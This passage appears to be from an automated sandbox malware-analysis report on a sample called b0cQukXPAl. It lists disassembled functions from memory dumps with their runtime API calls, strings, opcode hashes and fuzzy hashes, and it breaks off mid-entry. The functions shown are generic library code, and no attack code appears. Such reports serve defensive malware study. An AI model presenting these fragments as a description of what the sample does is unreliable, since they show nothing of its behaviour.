API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C

Function 020F5A5D Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 020F5A79
__Cnd_signal.LIBCPMT ref: 020F5A85
std::_Cnd_initX.LIBCPMT ref: 020F5A9A
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 020F5AA1

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction ID: 7ef0f47df6bc50eeed0647d8bf83ea77ffbd4fdead560c5e1d824d0f580d48a2
Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction Fuzzy Hash: 99F0E5324C0702DBEBB17B31C805B9ABBA3AF00725F14441CD24996DE0CFBAE8547E65

Function 02102848 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0210285F
GetLastError.KERNEL32(?,?,?,?,02108820,?,?,?,?,00000000,?,00000000), ref: 0210286E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02102884
__CxxThrowException@8.LIBVCRUNTIME ref: 02102892

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction ID: 5f545d6cb3127c4d4ef8484cd9e115d2711e3b524784014001a05298b7d9ca71
Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction Fuzzy Hash: 76F0EC3454010ABBCF10EFA4CD88E9F37B86B04701F600621B910E20D0D774D6049B64

Function 00412306 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041231C
GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
__CxxThrowException@8.LIBVCRUNTIME ref: 0041234E

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC

Function 0210256D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02102583
GetLastError.KERNEL32(?,?,?,?,?,02100D90), ref: 02102591
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021025A7
__CxxThrowException@8.LIBVCRUNTIME ref: 021025B5

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction ID: 2048de063e6a304fa726e8ade35292f6e1357049fdc05d68c1e4685cd6475b85
Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction Fuzzy Hash: DAE0D8716803192DE710B7758C5AFBF369C5B00B45F940871BD14D50C1FBB4D50445A8

Function 004192B9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8

TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
GetLastError.KERNEL32 ref: 00423981
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
__CxxThrowException@8.LIBVCRUNTIME ref: 004239A5

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C

Function 02109520 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02102949: TlsAlloc.KERNEL32(?,02100D90), ref: 0210294F

TlsAlloc.KERNEL32(?,02100D90), ref: 02113BD6
GetLastError.KERNEL32 ref: 02113BE8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02113BFE
__CxxThrowException@8.LIBVCRUNTIME ref: 02113C0C

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction ID: 792af0496748ffda1af57d250386145e1419d6906f862fa4e566f4960e7fd260
Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction Fuzzy Hash: 47E06830480311AFC314BFB99CCCA7E32686A00745B200E76E832D20E0FF74D0044E6D

Function 0041251D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041255A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D

Function 02102784 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02100D90), ref: 0210278E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02100D90), ref: 0210279D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021027B3
__CxxThrowException@8.LIBVCRUNTIME ref: 021027C1

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction ID: fb2d18f072c5b1fd6efe138da426c96a434bef8aa4b2cea78ed4e2b52d79a05e
Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction Fuzzy Hash: 60E08074640209ABCB10FFB5DD8DEAF73BC6A00745B700475A501E3090DB74E7048B75

Function 00412675 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412681
GetLastError.KERNEL32 ref: 0041268D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126B1

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC

Function 0041273B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
__CxxThrowException@8.LIBVCRUNTIME ref: 00412777

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C

Function 021028DC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 021028E8
GetLastError.KERNEL32 ref: 021028F4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0210290A
__CxxThrowException@8.LIBVCRUNTIME ref: 02102918

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction ID: ad4054e98667657349ad002a165f9faba5abd470e84a23fa728aff4681c7a14a
Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction Fuzzy Hash: 7AE086346402196FDB14BF65CC8DFBF37AD6B00745B504835B915D10E0EB79D1149A5C

Function 021029A2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02107BC8,00000000,?,?,02100D90,?,?,?,00000000,?,00000000), ref: 021029AE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021029BA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021029D0
__CxxThrowException@8.LIBVCRUNTIME ref: 021029DE

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction ID: e1952bd6292eb27608e909e01e619d37aeb888df1a95ccca9b83d12654f07203
Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction Fuzzy Hash: 54E086346401196BDB10BF65CC8CBBF376D6F00745B604825BD19D20E0DB75D1148AA8

Function 004126E2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
GetLastError.KERNEL32 ref: 004126F5
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412719

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C

Function 02102949 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02100D90), ref: 0210294F
GetLastError.KERNEL32 ref: 0210295C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02102972
__CxxThrowException@8.LIBVCRUNTIME ref: 02102980

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction ID: 902364d8dcd5841aa0d2acfe91963c77864b6092dc05e9e47caf689a93c60afa
Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction Fuzzy Hash: 62E0CD345401155B8714BB745C8CA7F32596A01715B600A25E461D20D0DBB4D0044658

Function 0042F06D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F0FD

Strings

pow, xrefs: 0042F0D5, 0042F0F2

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F

Function 00432A75 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMONLIBRARYCODE

Download Yara Rule

Strings

s2C, xrefs: 00432A88
s2C, xrefs: 00432B05, 00432BFC

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID: s2C$s2C
API String ID: 0-1833909196
Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89

Function 02118927 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0211895A
__IsNonwritableInCurrentImage.LIBCMT ref: 02118A13

Strings

csm, xrefs: 021189FD

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 39b940ce26275ca600d2d377a551336ee0cdaa9ac45cbefd40ccf6d7c515b34a
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: EF41D230A40209EFDF10DF68C884AAEBFA5BF85328F15C175E8159B391C7369A15CF92

Function 0043AE59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34

Strings

OCP, xrefs: 0043AEAD
ACP, xrefs: 0043AE77

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E

Function 0212B0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0212B31B,?,00000050,?,?,?,?,?), ref: 0212B19B

Strings

OCP, xrefs: 0212B114
ACP, xrefs: 0212B0DE

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 7775e0e0ba2a7b3fe83580905d899b829144dcd589042aa722b0ab82fa1a6129
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 5A21A162BD8134A6EB288F54ED01B9773AAEB40B5DF568424F909D7100F732DB68C294

Function 00401F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40

Strings

image/png, xrefs: 00401F4E

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54

Function 0040EF1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0

Strings

<(@, xrefs: 0040EF1F

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast
String ID: <(@
API String ID: 1452528299-4189137628
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5

Function 0040C506 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A

Strings

<(@, xrefs: 0040C53D
ios_base::failbit set, xrefs: 0040C506

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: <(@$ios_base::failbit set
API String ID: 4194217158-2207043977
Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC

Function 0041D9FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51

Strings

pContext, xrefs: 0041DA3B

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98

Function 0044067A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440681

Strings

RCC, xrefs: 004406B3
MOC, xrefs: 004406A4

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA

Function 0211FC75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 02129764: GetEnvironmentStringsW.KERNEL32 ref: 02129768

_free.LIBCMT ref: 0211FCB6
_free.LIBCMT ref: 0211FCBD

Strings

8o_, xrefs: 0211FC75, 0211FCA3

Memory Dump Source

